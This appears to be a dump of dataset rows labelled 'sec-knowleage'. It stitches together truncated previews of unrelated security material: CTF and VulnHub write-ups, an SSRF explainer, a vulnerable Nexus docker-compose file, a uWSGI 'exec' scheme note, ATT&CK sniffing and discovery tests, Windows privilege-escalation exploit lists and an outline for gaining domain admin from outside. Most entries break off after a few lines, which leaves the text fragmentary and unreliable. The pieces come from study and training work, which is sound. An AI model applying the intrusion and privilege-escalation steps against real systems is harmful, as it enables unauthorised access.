### ICS_CTF 利用概述 > ICS CTF竞赛内容来自于作者自身打比赛经验,如有不对之处,请各位多多谅解 Exploit是针对某种漏洞提供的多种利用方法,针对某一种漏洞可以有很多利用方法。 针对工控领域,其实目前多见的利用方式:组态利用、通信劫持、Web渗透。 ### ICS_CTF组态利用概述 组态是工控场景的核心,是工控编程与实现功能的核心内容,如果你不太懂组态,请自行学习自动化领域工业控制系统组态的相关书籍。 最好的学习方式是拿到相关的产品说明书,针对说明书上的内容一点一点学习。 组态的利用方法: 1. 强制IO(最管用的一种调试方法) 2. 工程加密与解密(工程加密是PLC一种保护措施,但仍存在被破解的可能) 3....
sec-knowleage
# Cody's First Blog - FLAG2 ## 0x00 Modifiy URL Parameter Try modify the url http://127.0.0.1/xxxxxxxxxx/?page=admin.inc To http://127.0.0.1/xxxxxxxxxx/?page=index The error shows ``` Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 16384 bytes) in /app/index.php on line 20 ``` So it wil...
sec-knowleage
## 一、定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。注意:除了http/https等方式可以造成ssrf,类似tcp connect 方式也可以探测内网一些ip 的端口是否开发服务,只不过危害比较小而已。 ## 二、SSRF 漏...
sec-knowleage
## Fake 150 (re, 150p) ### PL [ENG](#eng-version) Dostajemy [program](./fake) (elf), do analizy, i rozpoczynamy od zdekompilowania go: int main(int argc, char **argv) { v = 0; vv = (v >> 19); vvv = (v >> 63); if (argc > 1) { v = strtol(argv[1], 0, 10); } ...
sec-knowleage
# 0CTF 2019 Quals Team: c7, shalom, des, nazywam, Eternal, rodbert ### Table of contents * [Baby RSA (crypto)](crypto_babyrsa) * [Zer0lfsr (crypto)](crypto_lfsr) * [Baby Sponge (crypto)](crypto_keccak) * [Ghost pepper (web)](web_osgi)
sec-knowleage
# 开放安全数据集整理 整理、汇总网络安全方面的开放数据集,在[awesome-ml-for-cybersecurity](https://github.com/jivoi/awesome-ml-for-cybersecurity)和[**wstart**](https://xz.aliyun.com/u/395)师傅的文章[1]基础上进行补充和修改。 ## 网络安全相关 - [Samples of Security Related Data](http://www.secrepo.com/) - [DARPA Intrusion Detection Data Sets](https://www.ll.mit.edu/r-d...
sec-knowleage
# We got paged out, mr president! (forensic, misc, 973p) > We got some important data paged out. > Can you recover it? > pagefile.sys.gz > Hints: > The first key is named 'ct', the second one - 'fz'. Find out the remaining keys. This was an exercise in good Linux-fu. The file we had was 1GB large, so impossible to sear...
sec-knowleage
version: '3' services: web: image: vulhub/nexus:3.21.1 ports: - "8081:8081" volumes: - ./admin.password:/nexus-data/admin.password
sec-knowleage
# Sha4 (web, 300pts, 16 solves) > tl;dr > local file read, race condition, hash collision, template injection ![scr1](scr1.png) Start off by noticing that we have a local file read via the second form: ![scr2](scr2.png) Lets find out where the application root is: `etc/apache2/sites-enabled/000-default.conf` ``` <Virtu...
sec-knowleage
# Basics Category: Hardware > With all those CPU bugs I don't trust software anymore, so I came up with my custom TPM (trademark will be filed soon!). You can't break this, so don't even try. The following files were attached: `main.cpp`: ```cpp #include "obj_dir/Vcheck.h" #include <iostream> #include <memory> int main...
sec-knowleage
# Super Secret Hidden Service Web, 100 points ## Description: > TODO: Remember where I put that flag... ## Solution: A link to a website was attached. the site was called "Dead simple Todolists" and allowed creating a simple TODO list. The list created by using the interface had the following link: ``` http://138.247.1...
sec-knowleage
# Gitroot > https://download.vulnhub.com/gitroot/GitRoot.ova 靶场IP:`192.168.2.20` 扫描对外端口服务 ``` ┌──(root㉿kali)-[~/Desktop] └─# nmap -p1-65535 -sV 192.168.2.20 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 08:43 EDT Nmap scan report for 192.168.2.20 Host is up (0.00024s latency). Not shown: 65532 closed tcp ports ...
sec-knowleage
mysqlshow === 显示MySQL中数据库相关信息 ## 补充说明 **mysqlshow命令** 用于显示mysql服务器中数据库、表和列表信息。 ### 语法 ```shell mysqlshow(选项)(参数) ``` ### 选项 ```shell -h:MySQL服务器的ip地址或主机名; -u:连接MySQL服务器的用户名; -p:连接MySQL服务器的密码; --count:显示每个数据表中数据的行数; -k:显示数据表的索引; -t:显示数据表的类型; -i:显示数据表的额外信息。 ``` ### 参数 数据库信息:指定要显示的数据库信息,可以是一个数据库名,或者是数据库名和表名,或者是数据库名、表名和列名。
sec-knowleage
# 从外部网络获取域管理员权限 #### 简介 本文讲解一种域渗透测试方案。该方案的背景是你已经拥有了对具有一个或多个域网络的内部访问权限,但我们的目标是获取域管理员权限。 在某些测试活动中,我们通常拥有某种级别的内部网络访问权限。但这并不意味着你可以跳过之前的这些部分。虽然互联网上有一些工具可能会帮助你进行域名管理,但在此我将介绍一种手动方式查找获取DA权限所需信息的方法。 ### 操作步骤 一般而言从外部网络取得域管理权限包括许多步骤。 在真实的域渗透中情况通常比较复杂,需要你采用多种方式进行测试,不会都像本文概述的线性方式去实现。但是,本文阐述的这些步骤应该可以帮助你构建其域渗透测试的方案。 ## 枚举外部网络 **目标:发现...
sec-knowleage
traceroute === 显示数据包到主机间的路径 ## 补充说明 **traceroute命令** 用于追踪数据包在网络上的传输时的全部路径,它默认发送的数据包大小是40字节。 通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径。当然每次数据包由某一同样的出发点(source)到达某一同样的目的地(destination)走的路径可能会不一样,但基本上来说大部分时候所走的路由是相同的。 traceroute通过发送小的数据包到目的设备直到其返回,来测量其需要多长时间。一条路径上的每个设备traceroute要测3次。输出结果中包括每次测试的时间(ms)和设备的名称(如有的话)及其ip地址。 ...
sec-knowleage
# T1040-linux-网络嗅探 ## 来自ATT&CK的描述 网络嗅探是指使用系统上的网络接口来监视或捕获通过有线或无线连接发送的信息。攻击者可以将网络接口置于混杂模式以通过网络被动地访问传输中的数据,或者使用跨接端口来捕获更大量的数据。 通过该技术可以捕获的数据包括用户凭证,尤其是通过不安全的未加密协议发送的凭证;网络嗅探还可以获取到配置细节,例如运行服务,版本号以及后续横向移动和防御逃避活动所需的其他网络特征(例如:IP寻址,主机名,VLAN ID)。 ## 测试案例 tcpdump -c 5 -nnni #{网卡接口} tshark -c 5 -i #{网卡接口} ## 检测日志 linux /var/log/messa...
sec-knowleage
from sage.all import GF, PolynomialRing P=PolynomialRing(GF(2),'x') e = 31337 n = P('x^2048 + x^2046 + x^2043 + x^2040 + x^2036 + x^2035 + x^2034 + x^2033 + x^2031 + x^2029 + x^2025 + x^2024 + x^2022 + x^2019 + x^2018 + x^2017 + x^2012 + x^2007 + x^2006 + x^2004 + x^2000 + x^1999 + x^1998 + x^1997 + x^1993 + x^1992 + ...
sec-knowleage
code = '''addi sp, sp, -64 sw ra, 4(sp) sw s0, 0(sp) ...
sec-knowleage
# Flaskcards Web Exploitation, 350 points ## Description: > We found this fishy **website** for flashcards that we think may be sending secrets. Could you take a look? ## Solution: The website was a simple "Flashcard" system, allowing the user to create question-answer pairs and then view them: Card creation: ![Flask]...
sec-knowleage
# Prime 1 > https://download.vulnhub.com/prime/Prime_Series_Level-1.rar 靶场IP:`192.168.32.212` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.212 ...
sec-knowleage
# uWSGI configuration file uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a pr...
sec-knowleage
# MeePwn CTF 2018 Quals Team: shalom, eternal, rev, nazywam, c7f.m0d3, rodbert, msm ### Table of contents * [Bazik (crypto)](crypto_bazik) * [Omega Sector (web)](web_omega) * [Old school (crypto)](crypto_old_school) * [Image crackme (re/crypto)](re_image) * [PyCalcX 1 & 2 (web)](web_pycalcx) * [Ezchallz (web/crypto)](c...
sec-knowleage
# 论文日读:From TTP to IoC- Advanced Persistent Graphs for Threat Hunting ## 概要 论文:Berady, Aimad, Mathieu Jaume, Valerie Viet Triem Tong and Gilles Guette. From TTP to IoC: Advanced Persistent Graphs for Threat Hunting. *IEEE Transactions on Network and Service Management* 18, 2 (6/2021): 1321–33. https://doi.org/10.1109/T...
sec-knowleage
# T1518-001-win-利用wmic发现安全软件 ## 来自ATT&CK的描述 攻击者可能会尝试获取安装在系统或云环境中的安全软件,配置,防御工具和传感器的列表。这可能包括诸如防火墙规则和防病毒之类的内容。攻击者可以在自动发现过程中使用来自安全软件发现的信息来塑造后续行为,包括攻击者是否完全感染目标和/或尝试执行特定操作。 可用于获得安全软件的信息例如命令的netsh,reg query,dir与CMD,和任务列表,但发现行为其他指标可以是更具体的软件或安全系统的攻击者正在寻找的类型。看到macOS恶意软件对LittleSnitch和KnockKnock软件执行检查已变得越来越普遍。 ## 测试案例 枚举出目标系统安装的反病...
sec-knowleage
## How to setup a ftp server quickly Pleaes install [**pyftpdlib**](https://github.com/giampaolo/pyftpdlib) with pip or easy_install. ``` sudo easy_install pysendfile sudo easy_install pyftpdlib ``` or ``` sudo pip2 install pysendfile sudo pip2 install pyftpdlib ``` If you have installed **pyftpdlib** successfully, ple...
sec-knowleage
# Windows 提权 -- 快速查找 exp ### 微软官方时刻关注列表网址: ~~https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx~~ 地址更新为: https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017 ![](media/dff0648ea3163cbe403c144932470520.jpg) 比如常用的几个已公布的 exp: * KB2592799 * KB3000061 * KB2592799...
sec-knowleage
# 信息 `记录收集 Linux 系统软硬件信息的命令` --- ## 大纲 * **[软件](#软件)** * [版本信息](#版本信息) * [环境变量](#环境变量) * [开机启动](#开机启动) * [日志](#日志) * [应用服务](#应用服务) * [用户相关](#用户相关) * **[硬件](#硬件)** * [CPU](#CPU) * [内存](#内存) * [时间负载](#时间负载) * [网络](#网络) * [硬盘文件系统](#硬盘文件系统) --- ## 软件 ### 版本信息 ```bash hostname ...
sec-knowleage